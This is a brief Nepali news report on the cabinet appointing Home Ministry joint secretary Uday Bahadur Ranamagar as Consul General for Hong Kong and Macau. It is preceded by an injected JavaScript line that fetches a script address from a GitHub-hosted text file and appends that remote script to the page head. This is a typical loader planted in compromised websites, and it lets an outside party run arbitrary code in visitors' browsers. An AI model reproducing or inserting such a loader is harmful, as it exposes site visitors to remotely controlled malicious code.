;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
भदौ १४,
काठमाडाैं । सरकारले गृह मन्त्रालयका सहसचिव उदयबहादुर रानामगरलाई हङकङको महावाणिज्यदूतमा नियुक्त गरेको छ।
झापाका प्रमुख जिल्ला अधिकारीको जिम्मेवारीमा थिए उनी। उनलाई सरकारले मकाउसमेत हेर्ने गरी नियुक्त गरेको हो। आइतबार साँझ बसेको मन्त्रिपरिषदले रानामगरलाई हङकङ र मकाउका लागि महावाणिज्यदूत नियुक्त गर्ने निर्णय गरेको हो।
फेसबुक प्रतिक्रियाहरु